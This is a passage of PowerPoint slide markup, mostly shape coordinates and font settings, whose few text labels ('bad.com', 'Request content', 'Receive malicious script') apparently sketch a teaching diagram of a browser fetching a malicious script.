                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bad.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160782" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FAF776-5503-9442-9D9C-F55C6CFCD605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7059613" y="3111500"/>
            <a:ext cx="0" cy="1697038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 8977 h 2130425"/>
              <a:gd name="T1" fmla="*/ 8977 h 2130425"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2130425">
                <a:moveTo>
                  <a:pt x="-38100" y="1065129"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38100" y="1065129"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="213025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0783" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740BC354-FD13-F742-881B-DCC1B45AAD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6942138" y="4778375"/>
            <a:ext cx="234950" cy="242888"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1289 w 304800"/>
              <a:gd name="T1" fmla="*/ 0 h 304800"/>
              <a:gd name="T2" fmla="*/ 0 w 304800"/>
              <a:gd name="T3" fmla="*/ 0 h 304800"/>
              <a:gd name="T4" fmla="*/ 644 w 304800"/>
              <a:gd name="T5" fmla="*/ 2590 h 304800"/>
              <a:gd name="T6" fmla="*/ 1289 w 304800"/>
              <a:gd name="T7" fmla="*/ 0 h 3048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800" h="304800">
                <a:moveTo>
                  <a:pt x="304800" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152400" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304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0784" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B9331A-0F42-9141-8851-A4D4C2E0647B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7245350" y="3344863"/>
            <a:ext cx="363538" cy="374650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1734 w 471170"/>
              <a:gd name="T1" fmla="*/ 559 h 471170"/>
              <a:gd name="T2" fmla="*/ 1863 w 471170"/>
              <a:gd name="T3" fmla="*/ 860 h 471170"/>
              <a:gd name="T4" fmla="*/ 1957 w 471170"/>
              <a:gd name="T5" fmla="*/ 1192 h 471170"/>
              <a:gd name="T6" fmla="*/ 2011 w 471170"/>
              <a:gd name="T7" fmla="*/ 1547 h 471170"/>
              <a:gd name="T8" fmla="*/ 2031 w 471170"/>
              <a:gd name="T9" fmla="*/ 1911 h 471170"/>
              <a:gd name="T10" fmla="*/ 2011 w 471170"/>
              <a:gd name="T11" fmla="*/ 2277 h 471170"/>
              <a:gd name="T12" fmla="*/ 1957 w 471170"/>
              <a:gd name="T13" fmla="*/ 2630 h 471170"/>
              <a:gd name="T14" fmla="*/ 1863 w 471170"/>
              <a:gd name="T15" fmla="*/ 2962 h 471170"/>
              <a:gd name="T16" fmla="*/ 1734 w 471170"/>
              <a:gd name="T17" fmla="*/ 3262 h 471170"/>
              <a:gd name="T18" fmla="*/ 1574 w 471170"/>
              <a:gd name="T19" fmla="*/ 3507 h 471170"/>
              <a:gd name="T20" fmla="*/ 1397 w 471170"/>
              <a:gd name="T21" fmla="*/ 3682 h 471170"/>
              <a:gd name="T22" fmla="*/ 1210 w 471170"/>
              <a:gd name="T23" fmla="*/ 3786 h 471170"/>
              <a:gd name="T24" fmla="*/ 1015 w 471170"/>
              <a:gd name="T25" fmla="*/ 3822 h 471170"/>
              <a:gd name="T26" fmla="*/ 822 w 471170"/>
              <a:gd name="T27" fmla="*/ 3786 h 471170"/>
              <a:gd name="T28" fmla="*/ 633 w 471170"/>
              <a:gd name="T29" fmla="*/ 3682 h 471170"/>
              <a:gd name="T30" fmla="*/ 458 w 471170"/>
              <a:gd name="T31" fmla="*/ 3507 h 471170"/>
              <a:gd name="T32" fmla="*/ 297 w 471170"/>
              <a:gd name="T33" fmla="*/ 3262 h 471170"/>
              <a:gd name="T34" fmla="*/ 167 w 471170"/>
              <a:gd name="T35" fmla="*/ 2962 h 471170"/>
              <a:gd name="T36" fmla="*/ 74 w 471170"/>
              <a:gd name="T37" fmla="*/ 2630 h 471170"/>
              <a:gd name="T38" fmla="*/ 19 w 471170"/>
              <a:gd name="T39" fmla="*/ 2277 h 471170"/>
              <a:gd name="T40" fmla="*/ 0 w 471170"/>
              <a:gd name="T41" fmla="*/ 1911 h 471170"/>
              <a:gd name="T42" fmla="*/ 19 w 471170"/>
              <a:gd name="T43" fmla="*/ 1547 h 471170"/>
              <a:gd name="T44" fmla="*/ 74 w 471170"/>
              <a:gd name="T45" fmla="*/ 1192 h 471170"/>
              <a:gd name="T46" fmla="*/ 167 w 471170"/>
              <a:gd name="T47" fmla="*/ 860 h 471170"/>
              <a:gd name="T48" fmla="*/ 297 w 471170"/>
              <a:gd name="T49" fmla="*/ 559 h 471170"/>
              <a:gd name="T50" fmla="*/ 458 w 471170"/>
              <a:gd name="T51" fmla="*/ 315 h 471170"/>
              <a:gd name="T52" fmla="*/ 633 w 471170"/>
              <a:gd name="T53" fmla="*/ 140 h 471170"/>
              <a:gd name="T54" fmla="*/ 822 w 471170"/>
              <a:gd name="T55" fmla="*/ 35 h 471170"/>
              <a:gd name="T56" fmla="*/ 1015 w 471170"/>
              <a:gd name="T57" fmla="*/ 0 h 471170"/>
              <a:gd name="T58" fmla="*/ 1210 w 471170"/>
              <a:gd name="T59" fmla="*/ 35 h 471170"/>
              <a:gd name="T60" fmla="*/ 1397 w 471170"/>
              <a:gd name="T61" fmla="*/ 140 h 471170"/>
              <a:gd name="T62" fmla="*/ 1574 w 471170"/>
              <a:gd name="T63" fmla="*/ 315 h 471170"/>
              <a:gd name="T64" fmla="*/ 1734 w 471170"/>
              <a:gd name="T65" fmla="*/ 559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01862" y="68948"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="432027" y="105877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453573" y="146822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466501" y="190444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470810" y="235405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466501" y="280366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453573" y="323988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432027" y="364933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401862" y="401862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364933" y="432027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323988" y="453573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280366" y="466501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235405" y="470810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190444" y="466501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146822" y="453573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105877" y="432027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68948" y="401862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38783" y="364933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17237" y="323988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4309" y="280366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4309" y="190444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17237" y="146822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38783" y="105877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68948" y="68948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105877" y="38783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146822" y="17237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190444" y="4309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235405" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280366" y="4309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323988" y="17237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364933" y="38783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401862" y="68948"/>
                </a:lnTo>
                <a:close/>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0785" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE149F2-0875-B643-BAC1-514DDCC99B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6399213" y="5156200"/>
            <a:ext cx="263525" cy="227013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 534 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 2486 h 284479"/>
              <a:gd name="T4" fmla="*/ 1638 w 339725"/>
              <a:gd name="T5" fmla="*/ 2210 h 284479"/>
              <a:gd name="T6" fmla="*/ 534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110566" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="284048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339318" y="252590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105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60786" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A16F549-F7F6-2544-AAF1-A91135398680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="4316413"/>
            <a:ext cx="261937" cy="227012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1443 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 271 h 284479"/>
              <a:gd name="T4" fmla="*/ 971 w 339725"/>
              <a:gd name="T5" fmla="*/ 2484 h 284479"/>
              <a:gd name="T6" fmla="*/ 1443 w 339725"/>
              <a:gd name="T7" fmla="*/ 0 h 2844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9725" h="284479">
                <a:moveTo>
                  <a:pt x="339369" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="30962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228396" y="283883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3393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 name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED79ED4A-C147-AE4C-BD24-0B27C59C29AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3359150" y="5057775"/>
            <a:ext cx="3617913" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2174"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3400" baseline="1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="12" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-82" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="59" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160788" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B89A97C8-1AC9-E04B-A8DC-76F89B209355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3154363" y="4156075"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2135 w 471170"/>
              <a:gd name="T1" fmla="*/ 1262 h 471170"/>
              <a:gd name="T2" fmla="*/ 2202 w 471170"/>
              <a:gd name="T3" fmla="*/ 1666 h 471170"/>
              <a:gd name="T4" fmla="*/ 2226 w 471170"/>
              <a:gd name="T5" fmla="*/ 2074 h 471170"/>
              <a:gd name="T6" fmla="*/ 2207 w 471170"/>
              <a:gd name="T7" fmla="*/ 2475 h 471170"/>
              <a:gd name="T8" fmla="*/ 2147 w 471170"/>
              <a:gd name="T9" fmla="*/ 2860 h 471170"/>
              <a:gd name="T10" fmla="*/ 2050 w 471170"/>
              <a:gd name="T11" fmla="*/ 3217 h 471170"/>
              <a:gd name="T12" fmla="*/ 1917 w 471170"/>
              <a:gd name="T13" fmla="*/ 3534 h 471170"/>
              <a:gd name="T14" fmla="*/ 1751 w 471170"/>
              <a:gd name="T15" fmla="*/ 3801 h 471170"/>
              <a:gd name="T16" fmla="*/ 1554 w 471170"/>
              <a:gd name="T17" fmla="*/ 4007 h 471170"/>
              <a:gd name="T18" fmla="*/ 1338 w 471170"/>
              <a:gd name="T19" fmla="*/ 4134 h 471170"/>
              <a:gd name="T20" fmla="*/ 1121 w 471170"/>
              <a:gd name="T21" fmla="*/ 4178 h 471170"/>
              <a:gd name="T22" fmla="*/ 907 w 471170"/>
              <a:gd name="T23" fmla="*/ 4141 h 471170"/>
              <a:gd name="T24" fmla="*/ 702 w 471170"/>
              <a:gd name="T25" fmla="*/ 4029 h 471170"/>
              <a:gd name="T26" fmla="*/ 511 w 471170"/>
              <a:gd name="T27" fmla="*/ 3846 h 471170"/>
              <a:gd name="T28" fmla="*/ 343 w 471170"/>
              <a:gd name="T29" fmla="*/ 3597 h 471170"/>
              <a:gd name="T30" fmla="*/ 201 w 471170"/>
              <a:gd name="T31" fmla="*/ 3285 h 471170"/>
              <a:gd name="T32" fmla="*/ 91 w 471170"/>
              <a:gd name="T33" fmla="*/ 2915 h 471170"/>
              <a:gd name="T34" fmla="*/ 23 w 471170"/>
              <a:gd name="T35" fmla="*/ 2512 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2103 h 471170"/>
              <a:gd name="T38" fmla="*/ 19 w 471170"/>
              <a:gd name="T39" fmla="*/ 1702 h 471170"/>
              <a:gd name="T40" fmla="*/ 79 w 471170"/>
              <a:gd name="T41" fmla="*/ 1318 h 471170"/>
              <a:gd name="T42" fmla="*/ 177 w 471170"/>
              <a:gd name="T43" fmla="*/ 961 h 471170"/>
              <a:gd name="T44" fmla="*/ 309 w 471170"/>
              <a:gd name="T45" fmla="*/ 644 h 471170"/>
              <a:gd name="T46" fmla="*/ 475 w 471170"/>
              <a:gd name="T47" fmla="*/ 376 h 471170"/>
              <a:gd name="T48" fmla="*/ 672 w 471170"/>
              <a:gd name="T49" fmla="*/ 171 h 471170"/>
              <a:gd name="T50" fmla="*/ 887 w 471170"/>
              <a:gd name="T51" fmla="*/ 43 h 471170"/>
              <a:gd name="T52" fmla="*/ 1105 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1319 w 471170"/>
              <a:gd name="T55" fmla="*/ 37 h 471170"/>
              <a:gd name="T56" fmla="*/ 1524 w 471170"/>
              <a:gd name="T57" fmla="*/ 148 h 471170"/>
              <a:gd name="T58" fmla="*/ 1714 w 471170"/>
              <a:gd name="T59" fmla="*/ 331 h 471170"/>
              <a:gd name="T60" fmla="*/ 1882 w 471170"/>
              <a:gd name="T61" fmla="*/ 581 h 471170"/>
              <a:gd name="T62" fmla="*/ 2025 w 471170"/>
              <a:gd name="T63" fmla="*/ 893 h 471170"/>
              <a:gd name="T64" fmla="*/ 2135 w 471170"/>
              <a:gd name="T65" fmla="*/ 1262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51630" y="142261"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="466021" y="187720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470920" y="233728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466820" y="279041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="454217" y="322414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="433605" y="362603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405478" y="398365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370331" y="428456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328659" y="451630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283199" y="466021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237191" y="470920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191879" y="466820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148505" y="454217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108316" y="433605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72554" y="405478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42464" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19289" y="328659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4898" y="283199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="237191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4099" y="191879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16702" y="148506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37315" y="108316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65441" y="72554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100588" y="42464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142261" y="19289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187720" y="4898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233728" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279040" y="4099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322414" y="16702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362603" y="37315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398365" y="65441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428456" y="100588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451630" y="142261"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">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object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4AE713-8139-E341-9177-CECF784EF10B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3201988" y="4240213"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2725"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160790" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA24ABA-68C0-5E49-9387-11344475B9B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7312025" y="6151563"/>
            <a:ext cx="379413" cy="3635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91" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0A40EB-8260-AE46-A2F9-10377B58E74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="320675" cy="3032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60792" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A710E3B5-07DE-1D4A-9EA3-FC908348DDDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="322263" cy="303212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 415290"/>
              <a:gd name="T1" fmla="*/ 0 h 379729"/>
              <a:gd name="T2" fmla="*/ 2020 w 415290"/>
              <a:gd name="T3" fmla="*/ 0 h 379729"/>
              <a:gd name="T4" fmla="*/ 2020 w 415290"/>
              <a:gd name="T5" fmla="*/ 3364 h 379729"/>
              <a:gd name="T6" fmla="*/ 0 w 415290"/>
              <a:gd name="T7" fmla="*/ 3364 h 379729"/>
              <a:gd name="T8" fmla="*/ 0 w 415290"/>
              <a:gd name="T9" fmla="*/ 0 h 379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290" h="379729">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415086" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A0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2" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFEA629-263B-4349-B186-314323087196}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3775075" y="4381500"/>
            <a:ext cx="2847975" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2127"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2300" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-63" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="24" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160794" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA4C351F-C157-9F4E-ACF6-1FCDDF2C986B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2125 w 471170"/>
              <a:gd name="T1" fmla="*/ 1221 h 471170"/>
              <a:gd name="T2" fmla="*/ 2197 w 471170"/>
              <a:gd name="T3" fmla="*/ 1622 h 471170"/>
              <a:gd name="T4" fmla="*/ 2225 w 471170"/>
              <a:gd name="T5" fmla="*/ 2029 h 471170"/>
              <a:gd name="T6" fmla="*/ 2210 w 471170"/>
              <a:gd name="T7" fmla="*/ 2432 h 471170"/>
              <a:gd name="T8" fmla="*/ 2155 w 471170"/>
              <a:gd name="T9" fmla="*/ 2819 h 471170"/>
              <a:gd name="T10" fmla="*/ 2061 w 471170"/>
